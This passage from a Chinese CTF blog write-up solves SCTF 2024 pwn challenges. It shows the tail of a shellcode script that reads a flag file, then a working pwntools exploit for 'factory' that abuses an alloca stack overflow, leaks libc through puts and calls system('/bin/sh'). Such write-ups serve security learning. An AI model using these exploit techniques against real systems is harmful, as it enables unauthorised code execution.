p8(<span class="number">0x32</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;shellcode: &#x27;</span>)</span><br><span class="line"></span><br><span class="line">flag = <span class="number">0x67616c66</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#open(2,&#x27;flag&#x27;,0)</span></span><br><span class="line">payload = push_4_byte(flag)</span><br><span class="line">payload += push_rsp()</span><br><span class="line">payload += push_4_byte(<span class="number">0</span>)</span><br><span class="line">payload += swap_8_10()</span><br><span class="line">payload += push_4_byte(<span class="number">2</span>)</span><br><span class="line">payload += syscall()</span><br><span class="line"></span><br><span class="line"><span class="comment">#抬高栈</span></span><br><span class="line">payload += push_rsp()</span><br><span class="line">payload += copy_and_push()+copy_and_push()+copy_and_push()+copy_and_push()+copy_and_push()</span><br><span class="line"></span><br><span class="line"><span class="comment">#read(0,fd=3,buf,0x30)</span></span><br><span class="line">payload += copy_and_push()</span><br><span class="line">payload += push_4_byte(<span class="number">0x30</span>)</span><br><span class="line">payload += swap_8_10()</span><br><span class="line">payload += push_4_byte(<span class="number">3</span>)</span><br><span class="line">payload += push_4_byte(<span class="number">0</span>)</span><br><span class="line">payload += syscall()</span><br><span class="line"></span><br><span class="line"><span class="comment">#write(1,1,rsp,0x30)</span></span><br><span class="line">payload += pop()</span><br><span class="line">payload += copy_and_push()</span><br><span class="line">payload += push_4_byte(<span class="number">0x30</span>)</span><br><span class="line">payload += swap_8_10()</span><br><span class="line">payload += push_4_byte(<span class="number">1</span>)</span><br><span class="line">payload += push_4_byte(<span class="number">1</span>)</span><br><span class="line">payload += syscall()</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="factory"><a href="#factory" class="headerlink" title="factory"></a>factory</h2><p>看的时候看到一个可疑的函数<code>alloca</code><br>查询网络得知：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">输入的 num 用做 alloca 的参数 alloca(num)</span><br><span class="line">alloca 是从调用者的栈上分配内存，相当于 sub esp, eax</span><br></pre></td></tr></table></figure></div>
<p>所以这里是向上抬栈，然而反汇编的时候这个num的算法还是有比较明显的问题，大概是分配不够的。</p>
<p>本着分析不出来就开调的原则，尝试几个数观察抬栈高度以及写入数据的位置，基本可以得到：<br>原本栈空间为0x30，alloca后向上扩大，在扩大的地方写入数据，数据类型占用0x08，rbp+0x30的地方记录着i</p>
<p>那么就可以改i,我一开始为了看懂程序试的数都比较保守，看懂了之后直接选择最大的数打爆这个栈（<br>开调！<br>稍微要注意的就是在塞完rop之后有多余的输入机会，需要在这里注意一下，不过提前一次输入时停一下调试几步基本也很快可以搞定。</p>
<p>其实还是嗯调比较合理，能够直观的看到栈上的变化</p>
<p>再打的时候有时候脚本会自己不通，停在发送puts_got的地方，我猜是因为puts的实际地址超过了原来的程序做的一些限制或者是有负溢出，多滚几遍就通了。</p>
<p>exp:</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(log_level = <span class="string">&#x27;debug&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"></span><br><span class="line">elf_path=<span class="string">&#x27;./factory&#x27;</span></span><br><span class="line">libc_path=<span class="string">&#x27;./libc.so.6&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># p=remote(&quot;&quot;.)</span></span><br><span class="line">p= process(elf_path)</span><br><span class="line">elf=ELF(elf_path)</span><br><span class="line">libc=ELF(libc_path)</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x401563</span></span><br><span class="line">ret_addr = <span class="number">0x40148E</span></span><br><span class="line">bin_sh = <span class="number">0x1b45bd</span></span><br><span class="line">main_addr = <span class="number">0x040148F</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#-------------</span></span><br><span class="line">p.sendafter(<span class="string">b&#x27;How many factorys do you want to build: &#x27;</span>,<span class="string">b&#x27;40&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Each factory can produce 1 ton of parts per person per year. Please allocate the number of employees to each factory.&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x15</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="built_in">str</span>(i).encode())</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="string">b&#x27;28&#x27;</span>) <span class="comment">#22</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(pop_rdi)) <span class="comment">#23</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(puts_got)) <span class="comment">#30	</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(puts_plt)) <span class="comment">#31</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(main_addr)) <span class="comment">#32</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recvline()</span><br><span class="line">libc_base=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">success(<span class="string">&#x27;libc_base=&#x27;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">system_addr = libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh_addr = libc_base+bin_sh</span><br><span class="line"></span><br><span class="line"><span class="comment">#----------</span></span><br><span class="line">p.sendafter(<span class="string">b&#x27;How many factorys do you want to build: &#x27;</span>,<span class="string">b&#x27;40&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;Each factory can produce 1 ton of parts per person per year. Please allocate the number of employees to each factory.&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x15</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="built_in">str</span>(i).encode())</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="string">b&#x27;28&#x27;</span>) <span class="comment">#22</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(pop_rdi)) <span class="comment">#29</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(bin_sh_addr)) <span class="comment">#30</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(ret_addr)) <span class="comment">#31</span></span><br><span class="line">p.sendlineafter(<span class="string">b&quot; = &quot;</span>,<span class="built_in">str</span>(system_addr)) <span class="comment">#32</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.sendlineafter(<span class="string">b&#x27; = &#x27;</span>,<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 2024SCTF pwn题全解（上）</li>
        <li><strong>Author:</strong> M1aoo0bin</li>
        <li><strong>Created at
                :</strong> 2024-10-12 16:33:02</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-11-13 02:30:48
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2024/10/12/SCTF-vmcode/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/">#学习日志</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E5%A4%8D%E7%8E%B0/">#复现</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2024/10/17/%E8%B4%AA%E5%BF%83%E4%B8%8D%E8%B6%B3/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">贪心不足</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/09/23/ByteCTF2024/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">ByteCTF2024-ezheap</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">2024SCTF pwn题全解（上）</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2024SCTF"><span class="nav-number">1.</span> <span class="nav-text">2024SCTF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#vmcode"><span class="nav-number">1.1.</span> <span class="nav-text">vmcode</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%86%E5%90%91%E6%97%B6%E9%97%B4"><span class="nav-number">1.1.1.</span> <span class="nav-text">逆向时间</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BC%96%E5%86%99shellcode"><span class="nav-number">1.1.2.</span> <span class="nav-text">编写shellcode</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#factory"><span class="nav-number">1.2.</span> <span class="nav-text">factory</span></a></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
            <div class="customize-info my-1">借我酒一杯，慢叙愁百千</div>
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">M1aoo0bin</a>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.4</a></span>
        </div>
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>



    
<script src="/js/tools/localSearch.js" type="module"></script>




    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>









<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
